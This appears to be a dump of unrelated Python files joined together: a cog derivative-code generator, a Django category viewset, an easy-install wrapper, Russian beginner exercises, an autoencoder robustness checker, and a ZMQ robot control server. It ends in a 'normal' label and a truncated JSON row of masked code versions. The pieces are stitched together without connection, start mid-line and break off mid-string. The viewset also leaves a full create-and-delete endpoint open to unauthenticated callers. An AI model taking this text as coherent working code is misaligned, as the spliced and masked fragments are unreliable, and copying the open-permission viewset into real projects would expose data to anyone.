"kograd_1_", "kograd_2_"] PREFIX_DD = ["grad2_0_0_", "grad2_0_1_", "grad2_0_2_", "grad2_1_1_", "grad2_1_2_", "grad2_2_2_"] # first derivative in i direction FUNC_D_I=[] for f in D: for p in PREFIX_D: FUNC_D_I.append(p+f) # second derivative in ij direction FUNC_D_IJ=[] for f in DD: for p in PREFIX_DD: FUNC_D_IJ.append(p+f) #advective derivative in i direction FUNC_AD_I=[] for f in AD: for p in PREFIX_AD: FUNC_AD_I.append(p+f) #Kriess-Oliger derivative in i direction FUNC_KOD_I=[] for f in D: for p in PREFIX_KOD: FUNC_KOD_I.append(p+f) FUNC_CONS=[] for f in CONSTRAINT_D: for p in PREFIX_D: FUNC_CONS.append(p+f) for f in CONSTRAINT_DD: for p in PREFIX_DD: FUNC_CONS.append(p+f) def allocDerivMemory(): for deriv in FUNC_D_I: cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);") for deriv in FUNC_D_IJ: cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);") for deriv in FUNC_AD_I: cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);") def computeRHSDerivs(): for var in D: cog.outl("\t deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_D[0] + var ,var)) cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_D[1] + var ,var)) cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_D[2] + var ,var)) if var in DD: cog.outl("\t deriv_xx(%s, %s, hx, sz, bflag);" %(PREFIX_DD[0] + var ,var)) cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_DD[1] + var , PREFIX_D[0] + var )) cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[2] + var , PREFIX_D[0] + var )) cog.outl("\t deriv_yy(%s, %s, hx, sz, bflag);" %(PREFIX_DD[3] + var ,var)) cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[4] + var , PREFIX_D[1] + var)) cog.outl("\t deriv_zz(%s, %s, hx, sz, bflag);" %(PREFIX_DD[5] + var ,var)) if var in AD: cog.outl("\t adv_deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_AD[0] + var ,var)) cog.outl("\t adv_deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_AD[1] + var ,var)) cog.outl("\t adv_deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_AD[2] + var ,var)) def deallocDerivMemory(): for deriv in FUNC_D_I: cog.outl("\t free(%s);" %(deriv)) for deriv in FUNC_D_IJ: cog.outl("\t free(%s);" %(deriv)) for deriv in FUNC_AD_I: cog.outl("\t free(%s);" %(deriv))
from . import *
from rest_framework import permissions

from core.serializers import CategorySerializer
from core.models.category_model import Category


# `viewsets` is expected to be provided by the star import above.
class CategoryViewSet(viewsets.ModelViewSet):
    serializer_class = CategorySerializer
    queryset = Category.objects.all()

    def get_permissions(self):
        # Open endpoint: any caller may use this viewset.
        permission_classes = (permissions.AllowAny,)
        return [permission() for permission in permission_classes]
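# A sketch of wiring this viewset into a URL conf -- the import path and
# route prefix below are assumptions for illustration, not taken from this
# project:
#
#   # urls.py
#   from rest_framework.routers import DefaultRouter
#   from core.views.category_view import CategoryViewSet
#
#   router = DefaultRouter()
#   router.register(r'categories', CategoryViewSet, basename='category')
#   urlpatterns = router.urls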
#!d:\python_projects\env2\scripts\python.exe
# EASY-INSTALL-DEV-SCRIPT: 'Django==2.1.dev20180209010235','django-admin.py'
__requires__ = 'Django==2.1.dev20180209010235'
__import__('pkg_resources').require('Django==2.1.dev20180209010235')
__file__ = 'D:\\python_projects\\ENV2\\django\\django\\bin\\django-admin.py'
exec(compile(open(__file__).read(), __file__, 'exec'))
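# This wrapper is what setuptools develop mode (`pip install -e`) drops into
# the virtualenv's Scripts directory: it pins the requirement, then compiles
# and executes the real django-admin.py from the source checkout. A rough
# hand-written equivalent (using the paths hard-coded above) might be:
#
#   import pkg_resources, runpy
#   pkg_resources.require('Django==2.1.dev20180209010235')
#   runpy.run_path('D:\\python_projects\\ENV2\\django\\django\\bin\\django-admin.py',
#                  run_name='__main__')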
#dict1 = {"я":"i","люблю":"love","Питон":"Рython"} #user_input = input("---->") #print(dict1[user_input]) #list1 =[i for i in range(0,101) if i%7 ==0 if i%5 !=0] #print(list1) #stroka = "я обычная строка быть которая должна быть длиннее чем десять символ" #stroka1=stroka.split() #dict1={} #for i in stroka1: # dict1[i] = stroka.count(i) #print(dict1) # #ФУНКЦИИ ##1. ##def foo(): ## print("Мой любимый фильм ето ",input()) ##foo() ##2. ##import random ##def rand(): ## rn = random.randint(0,10) ## return rn ##x=rand() ##print(x) ##list1=[] ##for i in range(0,10): ## list1.append(rand()) ##print(list1) ##3. ##def arifm(*x): ## return(sum(x)/len(x)) ##print(arifm(1,2,4,5,6)) ##4. ##def dict2(x,y): ## return {x:y} ##dict1 = {} ##dict1.update(dict2("GB","London")) ##print(dict1) ##dict5 = {} ##dict5.update(dict2("Hungary","Budapest")) ##print(dict5)
import pandas as pd
import copy as cp
import numpy as np
from autoencoder import *
from encoding import smtEncoding
import matplotlib
import matplotlib.pyplot as plt
from data_generator import *
from marabou_encoding import marabouEncoding


def main():
    '''
    Trains an autoencoder on (generated) data and checks adversarial robustness
    '''
    architecture = [10, 5, 10]  # Change the architecture of the autoencoder according to requirement

    print('----------Training autoencoder----------')
    aut = autoencoder(architecture=architecture)
    data = pd.read_csv('datasets/sine_curve.csv', header=None)

    aut.train(data, epochs=20, learning_rate=0.01)

    if not aut.saveflag:
        aut.saveAE()
        print("Saving the autoencoder after training")

    #plot_output([data, aut.predict(data)], ['Original', 'Reconstructed'])

    print("------Checking properties of autoencoders-------")

    # Parameters that can be modified
    boundingBox = 1  # Region around origin where the properties need to be checked
    prop1 = ['adversarial-example', 0.1]
    prop2 = ['adversarial-robustness', [1] * 10, 0.1, 0.1]
    prop3 = ['fairness', 1, 0.1]

    enc = smtEncoding()
    counterExample = enc.checkProperties(autoencoder=aut, prop=prop2,
                                         boundingBox=boundingBox)

    # For Marabou
    mara = marabouEncoding()
    mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=boundingBox,
                         folder="Demo-aut/autoencoder.onnx")

    if counterExample is None:
        print("Autoencoder satisfies property in the given region")
    else:
        print("Autoencoder does not satisfy property in the given region for",
              counterExample)


main()
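# The other two property templates defined in main() (prop1 and prop3) can
# be checked the same way; this usage sketch only swaps the `prop` argument
# and is otherwise identical to the prop2 call above (no new APIs assumed).
# It would go inside main(), after the prop2 check:
#
#   for p in (prop1, prop3):
#       cex = enc.checkProperties(autoencoder=aut, prop=p, boundingBox=boundingBox)
#       print(p[0], 'counterexample:', cex)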
#!/usr/bin/env python
"""Server that accepts and executes control-type commands on the bot."""

import sys
import os
from inspect import getmembers, ismethod
from simplejson.decoder import JSONDecodeError
import zmq
import signal

# This is required to make imports work
sys.path = [os.getcwd()] + sys.path

import bot.lib.lib as lib
import pub_server as pub_server_mod
import bot.lib.messages as msgs

from bot.driver.mec_driver import MecDriver


def is_api_method(obj, name):
    """Tests whether named method exists in obj and is flagged for API export.

    :param obj: API-exported object to search for the given method on.
    :type obj: object
    :param name: Name of method to check for.
    :type name: string
    :returns: True if given method is on given obj and is exported, else False.

    """
    try:
        method = getattr(obj, name)
    except AttributeError:
        return False
    return (ismethod(method) and hasattr(method, "__api_call"))


class CtrlServer(object):

    """Exports bot control via ZMQ.

    Most functionality exported by CtrlServer is in the form of methods
    exposed by the API. @lib.api_call decorators can be added to bot
    systems, which tags them for export. They can then be called
    remotely via CtrlClient, which is typically owned by an interface
    like the CLI, which typically accepts commands from an agent like
    a human.

    Some control is exported directly by CtrlServer, not through the
    API. For example, CtrlServer responds directly to ping messages,
    list messages (which give the objects/methods exposed by the API),
    and exit messages.

    CtrlServer is the primary owner of bot resources, which we call
    systems. For example, it's CtrlServer that instantiates gunner
    and follower. Through those two, CtrlServer owns the gun, the
    IR hub, the turret and basically every other bot system.

    The messages that CtrlServer accepts and responds with are fully
    specified in lib.messages. Make any changes to messages there.

    CtrlServer can be instructed (via the API) to spawn a new thread
    for a PubServer. When that happens, CtrlServer passes its systems
    to PubServer, which can read their state and publish it over a
    ZMQ PUB socket.

    """

    def __init__(self, testing=None, config_file="bot/config.yaml"):
        """Build ZMQ REP socket and instantiate bot systems.

        :param testing: True if running on simulated HW, False if on bot.
        :type testing: boolean
        :param config_file: Name of file to read configuration from.
        :type config_file: string

        """
        # Register signal handler, shut down cleanly (think motors)
        signal.signal(signal.SIGINT, self.signal_handler)

        # Load configuration and logger
        self.config = lib.get_config(config_file)
        self.logger = lib.get_logger()

        # Testing flag will cause objects to run on simulated hardware
        if testing is True or testing == "True":
            self.logger.info("CtrlServer running in test mode")
            lib.set_testing(True)
        elif testing is None:
            self.logger.info(
                "Defaulting to config testing flag: {}".format(
                    self.config["testing"]))
            lib.set_testing(self.config["testing"])
        else:
            self.logger.info("CtrlServer running in non-test mode")
            lib.set_testing(False)

        # Build socket to listen for requests
        self.context = zmq.Context()
        self.ctrl_sock = self.context.socket(zmq.REP)
        self.server_bind_addr = "{protocol}://{host}:{port}".format(
            protocol=self.config["server_protocol"],
            host=self.config["server_bind_host"],
            port=self.config["ctrl_server_port"])
        try:
            self.ctrl_sock.bind(self.server_bind_addr)
        except zmq.ZMQError:
            self.logger.error("ZMQ error. Is a server already running?")
            self.logger.warning("May be connected to an old server instance.")
            sys.exit(1)

        self.systems = self.assign_subsystems()
        self.logger.info("Control server initialized")

        # Don't spawn pub_server until told to
        self.pub_server = None

    def signal_handler(self, signal, frame):
        """Shut down cleanly (stop motors, close sockets) on SIGINT."""
        self.logger.info("Caught SIGINT (Ctrl+C), closing cleanly")
        self.clean_up()
        self.logger.info("Cleaned up bot, exiting...")
        sys.exit(0)

    def assign_subsystems(self):
        """Instantiates and stores references to bot subsystems.

        :returns: Dict of subsystems, maps system name to instantiated object.

        """
        self.driver = MecDriver()

        systems = {}
        systems["ctrl"] = self
        systems["driver"] = self.driver

        self.logger.debug("Systems: {}".format(systems))
        return systems

    def listen(self):
        """Perpetually listen for messages, pass them to generic handler."""
        self.logger.info("Control server: {}".format(self.server_bind_addr))
        while True:
            try:
                msg = self.ctrl_sock.recv_json()
                reply = self.handle_msg(msg)
                self.logger.debug("Sending: {}".format(reply))
                self.ctrl_sock.send_json(reply)
            except JSONDecodeError:
                err_msg = "Not a JSON message!"
                self.logger.warning(err_msg)
                self.ctrl_sock.send_json(msgs.error(err_msg))
            except KeyboardInterrupt:
                self.logger.info("Exiting control server. Bye!")
                self.clean_up()
                sys.exit(0)

    def handle_msg(self, msg):
        """Generic message handler. Dispatches based on the type of message.

        :param msg: Message, received via ZMQ from client, to handle.
        :type msg: dict
        :returns: An appropriate message reply dict, from lib.messages.

        """
        self.logger.debug("Received: {}".format(msg))

        try:
            msg_type = msg["type"]
        except KeyError as e:
            return msgs.error(e)

        if msg_type == "ping_req":
            reply = msgs.ping_reply()
        elif msg_type == "list_req":
            reply = self.list_callables()
        elif msg_type == "call_req":
            try:
                obj_name = msg["obj_name"]
                method = msg["method"]
                params = msg["params"]
                reply = self.call_method(obj_name, method, params)
            except KeyError as e:
                return msgs.error(e)
        elif msg_type == "exit_req":
            self.logger.info("Received message to die. Bye!")
            reply = msgs.exit_reply()
            # Need to actually send reply here as we're about to exit
            self.logger.debug("Sending: {}".format(reply))
            self.ctrl_sock.send_json(reply)
            self.clean_up()
            sys.exit(0)
        else:
            err_msg = "Unrecognized message: {}".format(msg)
            self.logger.warning(err_msg)
            reply = msgs.error(err_msg)
        return reply

    def list_callables(self):
        """Build list of callable methods on each exported subsystem object.

        Uses introspection to create a list of callable methods for each
        registered subsystem object. Only methods which are flagged using the
        @lib.api_call decorator will be included.

        :returns: list_reply message with callable objects and their methods.

        """
        self.logger.debug("List of callable API objects requested")
        # Dict of subsystem object names to their callable methods.
        callables = {}
        for name, obj in self.systems.items():
            methods = []
            # Filter out methods which are not explicitly flagged for export
            for member in getmembers(obj):
                if is_api_method(obj, member[0]):
                    methods.append(member[0])
            callables[name] = methods
        return msgs.list_reply(callables)

    def call_method(self, name, method, params):
        """Call a previously registered subsystem method by name. Only
        methods tagged with the @api_call decorator can be called.

        :param name: Assigned name of the registered subsystem.
        :type name: string
        :param method: Subsystem method to be called.
        :type method: string
        :param params: Additional parameters for the called method.
        :type params: dict
        :returns: call_reply or error message dict to be sent to caller.

        """
        self.logger.debug("API call: {}.{}({})".format(name, method, params))
        if name in self.systems:
            obj = self.systems[name]
            if is_api_method(obj, method):
                try:
                    # Calls given obj.method, unpacking and passing params dict
                    call_return = getattr(obj, method)(**params)
                    msg = "Called {}.{}".format(name, method)
                    self.logger.debug(msg + ", returned: {}".format(call_return))
                    return msgs.call_reply(msg, call_return)
                except TypeError:
                    # Raised when we have a mismatch of the method's kwargs
                    # TODO: Return argspec here?
                    err_msg = "Invalid params for {}.{}".format(name, method)
                    self.logger.warning(err_msg)
                    return msgs.error(err_msg)
                except Exception as e:
                    # Catch exception raised by called method, notify client
                    err_msg = "Exception: '{}'".format(str(e))
                    self.logger.warning(err_msg)
                    return msgs.error(err_msg)
            else:
                err_msg = "Invalid method: '{}.{}'".format(name, method)
                self.logger.warning(err_msg)
                return msgs.error(err_msg)
        else:
            err_msg = "Invalid object: '{}'".format(name)
            self.logger.warning(err_msg)
            return msgs.error(err_msg)

    @lib.api_call
    def echo(self, msg=None):
        """Echo a message back to the caller.

        :param msg: Message to be echoed back to caller, default is None.
        :returns: Message given by param, defaults to None.

        """
        return msg

    @lib.api_call
    def exception(self):
        """Raise a test exception which will be returned to the caller."""
        raise Exception("Exception test")

    @lib.api_call
    def spawn_pub_server(self):
        """Spawn publisher thread."""
        if self.pub_server is None:
            self.pub_server = pub_server_mod.PubServer(self.systems)
            # Prevent pub_server thread from blocking the process from closing
            self.pub_server.setDaemon(True)
            self.pub_server.start()
            msg = "Spawned pub server"
            self.logger.info(msg)
            return msg
        else:
            err_msg = "PubServer is already running"
            self.logger.warning(err_msg)
            return err_msg

    @lib.api_call
    def stop_full(self):
        """Stop all drive and gun motors, set turret to safe state."""
        # Only the driver is wired up in assign_subsystems above
        self.systems["driver"].move(0, 0)

    def clean_up(self):
        """Stop motors and tear down ZMQ socket."""
        self.stop_full()
        self.ctrl_sock.close()
        self.context.term()


if __name__ == "__main__":
    if len(sys.argv) == 2:
        server = CtrlServer(sys.argv[1])
    else:
        server = CtrlServer()
    server.listen()
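# --- Hedged usage sketch (not part of the dataset row above) ---
# A minimal client for the REP socket exposed by CtrlServer. The message
# shapes ("ping_req", and "call_req" with obj_name/method/params) are taken
# from handle_msg() above; the address and port are assumed examples, since
# the real values come from bot/config.yaml.
import zmq


def ping_ctrl_server(addr="tcp://127.0.0.1:60000"):  # port is hypothetical
    context = zmq.Context()
    sock = context.socket(zmq.REQ)
    sock.connect(addr)
    # Ping the server
    sock.send_json({"type": "ping_req"})
    print(sock.recv_json())
    # Call an exported API method: CtrlServer.echo
    sock.send_json({"type": "call_req", "obj_name": "ctrl",
                    "method": "echo", "params": {"msg": "hello"}})
    print(sock.recv_json())
    sock.close()
    context.term()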
normal
{ "blob_id": "ddb81e3ce0df44ee503c558b68b41c35935358a0", "index": 8663, "step-1": "<mask token>\n\n\nclass CtrlServer(object):\n <mask token>\n <mask token>\n <mask token>\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. 
Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n <mask token>\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass CtrlServer(object):\n <mask token>\n\n def __init__(self, testing=None, config_file='bot/config.yaml'):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n if testing is True or testing == 'True':\n self.logger.info('CtrlServer running in test mode')\n lib.set_testing(True)\n elif testing is None:\n self.logger.info('Defaulting to config testing flag: {}'.format\n (self.config['testing']))\n lib.set_testing(self.config['testing'])\n else:\n self.logger.info('CtrlServer running in non-test mode')\n lib.set_testing(False)\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = '{protocol}://{host}:{port}'.format(protocol\n =self.config['server_protocol'], host=self.config[\n 'server_bind_host'], port=self.config['ctrl_server_port'])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error('ZMQ error. 
Is a server already running?')\n self.logger.warning('May be connected to an old server instance.')\n sys.exit(1)\n self.systems = self.assign_subsystems()\n self.logger.info('Control server initialized')\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info('Caught SIGINT (Ctrl+C), closing cleanly')\n self.clean_up()\n self.logger.info('Cleaned up bot, exiting...')\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. 
Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug('API call: {}.{}({})'.format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n call_return = getattr(obj, method)(**params)\n msg = 'Called {}.{}'.format(name, method)\n self.logger.debug(msg + ',returned:{}'.format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n err_msg = 'Invalid params for {}.{}'.format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef is_api_method(obj, name):\n \"\"\"Tests whether named method exists in obj and is flagged for API export.\n\n :param obj: API-exported object to search for the given method on.\n :type ojb: string\n :param name: Name of method to check for.\n :type name: string\n :returns: True if given method is on given obj and is exported, else False.\n\n \"\"\"\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return ismethod(method) and hasattr(method, '__api_call')\n\n\nclass CtrlServer(object):\n \"\"\"Exports bot control via ZMQ.\n\n Most functionally exported by CtrlServer is in the form of methods\n exposed by the API. @lib.api_call decorators can be added to bot\n systems, which tags them for export. They can then be called\n remotely via CtrlClient, which is typically owned by an interface\n like the CLI, which typically accepts commands from an agent like\n a human.\n\n Some control is exported directly by CtrlServer, not through the\n API. 
For example, CtrlServer responds directly to ping messages,\n list messages (which give the objects/methods exposed by the API),\n and exit messages.\n\n CtrlServer is the primary owner of bot resources, which we call\n systems. For example, it's CtrlServer that instantiates gunner\n and follower. Through those two, CtrlServer owns the gun, the\n IR hub, the turret and basically every other bot system.\n\n The messages that CtrlServer accepts and responds with are fully\n specified in lib.messages. Make any changes to messages there.\n\n CtrlServer can be instructed (via the API) to spawn a new thread\n for a PubServer. When that happens, CtrlServer passes its systems\n to PubServer, which can read their state and publish it over a\n ZMQ PUB socket.\n\n \"\"\"\n\n def __init__(self, testing=None, config_file='bot/config.yaml'):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n if testing is True or testing == 'True':\n self.logger.info('CtrlServer running in test mode')\n lib.set_testing(True)\n elif testing is None:\n self.logger.info('Defaulting to config testing flag: {}'.format\n (self.config['testing']))\n lib.set_testing(self.config['testing'])\n else:\n self.logger.info('CtrlServer running in non-test mode')\n lib.set_testing(False)\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = '{protocol}://{host}:{port}'.format(protocol\n =self.config['server_protocol'], host=self.config[\n 'server_bind_host'], port=self.config['ctrl_server_port'])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error('ZMQ error. Is a server already running?')\n self.logger.warning('May be connected to an old server instance.')\n sys.exit(1)\n self.systems = self.assign_subsystems()\n self.logger.info('Control server initialized')\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info('Caught SIGINT (Ctrl+C), closing cleanly')\n self.clean_up()\n self.logger.info('Cleaned up bot, exiting...')\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. 
Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = 